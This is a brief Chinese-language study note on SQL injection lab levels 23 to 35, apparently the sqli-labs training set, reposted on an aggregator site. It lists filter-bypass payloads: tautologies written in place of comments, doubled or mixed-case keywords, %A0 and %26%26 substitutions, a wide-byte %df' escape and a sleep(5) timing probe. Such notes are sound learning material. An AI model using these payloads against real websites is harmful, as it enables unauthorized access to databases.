23(基于錯誤，過濾注釋符號)
過濾注釋符，我們將注釋符號換為 or ‘1’='1 或者 and ‘1’='1
如果是其他字符類型換符合就行了.
如；or (‘1’)=('1

24(不討論)

25(過濾了and和or)
雙寫or或者and繞過，或者大小寫繞過

26(過濾了空格注釋符和and和or)
%A0替代空格，%A0or%A0(‘1’)=('1或者%A0%26%26%A0(‘1’)=('1替代注釋符，雙寫or或者and繞過，或者大小寫繞過

27(過濾了注釋符號和union和select)
union和select大小寫繞過或者雙寫，%A0or%A0’1’=‘1或者%A0%26%26%A0’1’='1替代注釋符

28(過濾了注釋符號和union和select和空格)
union和select大小寫繞過或者雙寫，%A0替代空格，%A0and%A0(‘1’)=('1或者%A0andA0(‘1’)=('1替代注釋符

29----單引號正常顯注

30----雙引號正常顯注

31----")正常顯注

32—寬字節
輸入單引號會被轉義
?id=-1%df’ xxxxxxxxxxxxxxxxxx --+

33—寬字節

34—寬字節

35—正常顯注

總結：
當注釋符被過濾掉時候
可以這樣判斷
1’ and sleep(5) and ‘1’='1

將注釋符號改為 %A0or%A0’1’=‘1或者%A0%26%26%A0’1’='1，從而繞過過濾注釋符

總結

以上是生活随笔為你收集整理的23-35自己总结的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。